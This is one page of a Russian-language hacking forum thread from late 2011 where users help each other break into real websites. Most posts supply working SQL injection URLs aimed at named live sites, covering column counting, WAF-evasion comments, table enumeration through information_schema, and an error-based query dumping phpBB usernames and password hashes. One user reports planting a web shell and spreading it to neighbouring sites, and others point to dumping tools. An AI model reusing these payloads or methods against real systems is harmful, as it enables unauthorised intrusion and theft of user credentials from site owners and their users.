Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 940 of 1207
  1. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    как версию БД тут вывести?
     
    #18781 er9j6@, 28 Dec 2011
  2. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    462
    Likes Received:
    784
    Reputations:
    313
    @@version
     
    #18782 Lilo, 28 Dec 2011
    1 person likes this.
  3. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    http://www.afr.ru/region/(303)and(1)=(0)union(select(@@version),@@version,@@version)#

    Не могу найти вывод.
     
    #18783 er9j6@, 28 Dec 2011
    1 person likes this.
  4. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Блин... Сначал найди кол-во:
    http://www.afr.ru/region/(303)and(1)=(0)union(select(1),2,3)#
    http://www.afr.ru/region/(303)and(1)=(0)union(select(1),2,3,4)#
    и т.д. пока не исчезнет ошибка...
     
    #18784 Ereee, 28 Dec 2011
    1 person likes this.
  5. p3d

    p3d New Member

    Joined:
    24 Jul 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    1 and extractvalue(rand(),concat(0x3a,(select concat(char(58),user_id,char(58),username,char(58),user_password) from phpbb_users limit 1001,1)))--
    подскажите прогу чтоб сдампить таблицу, стоит форум phpbb
     
    #18785 p3d, 28 Dec 2011
  6. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    https://rdot.org/forum/showthread.php?t=519
     
    #18786 stepashka_, 28 Dec 2011
  7. p3d

    p3d New Member

    Joined:
    24 Jul 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    там окончание лимит нужно, а тут скобки
     
    #18787 p3d, 28 Dec 2011
  8. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    https://rdot.org/forum/showthread.php?t=1142 попробуй этим.
     
    #18788 stepashka_, 28 Dec 2011
  9. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Не надо, там новая версия лежить, с новыми возможностями!
     
    #18789 Ereee, 28 Dec 2011
    3 people like this.
  10. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Code:
    http://ogra.org.pk/cats_disp.php?cat=-172
    It has 8 order by.

    I cannot get tables.

    It's WAF and I've tried all my WAF skills.
     
    #18790 lightangel, 29 Dec 2011
  11. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    http://ogra.org.pk//cats_disp.php?cat=-20+/*!union*/+select+1,2,3,4,5,version(),7,8--+
     
    #18791 smirk, 29 Dec 2011
    1 person likes this.
  12. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Sorry, I mean tables and not the version.

    I already had the version.
     
    #18792 lightangel, 29 Dec 2011
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://ogra.org.pk//cats_disp.php?cat=-20+/*!union*/+select+1,2,3,4,5,/*!table_name*/,7,8/**//*!from*//**/information_schema.%60tables%60--+

    =\
     
    _________________________
    #18793 Konqi, 29 Dec 2011
    4 people like this.
  14. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    http://www.traktora.com.ua/subcat.php?sort=1
    Можно что-то выжать?
     
    #18794 shadowrun, 29 Dec 2011
  15. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    можно, но из другого скрипта:
    http://www.traktora.com.ua/catalog.php?cat=-2+union+select+version()--
     
    #18795 d1v, 29 Dec 2011
    3 people like this.
  16. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Спасибо! :)
     
    #18796 shadowrun, 29 Dec 2011
    2 people like this.
  17. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    MSSQL INJ
    дает ответ
    Возможно ли обойти DISTINCT в инъекции путем конверта или еще как то?

    Спасибо
     
    #18797 jangle, 30 Dec 2011
  18. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Select DISTINCT cast (Your Col Name as NVARCHAR(MAX))
     
    #18798 Ereee, 30 Dec 2011
  19. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    залил шелл на один сайт, потом решил залить на соседние сайты, все норм задивается но файл не находит, другие файлы с этой директории читает кроме моих, как можно решить проблему?
     
    #18799 DyukiN, 30 Dec 2011
  20. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Возможно сайты на другом сервере. Т.е. у тебя остались старые версии сайтов. Попробуй сделать что-то типа 123.txt, если не находит, то возможно я прав.
     
    #18800 Ereee, 30 Dec 2011
(You must log in or sign up to post here.)
Page 940 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.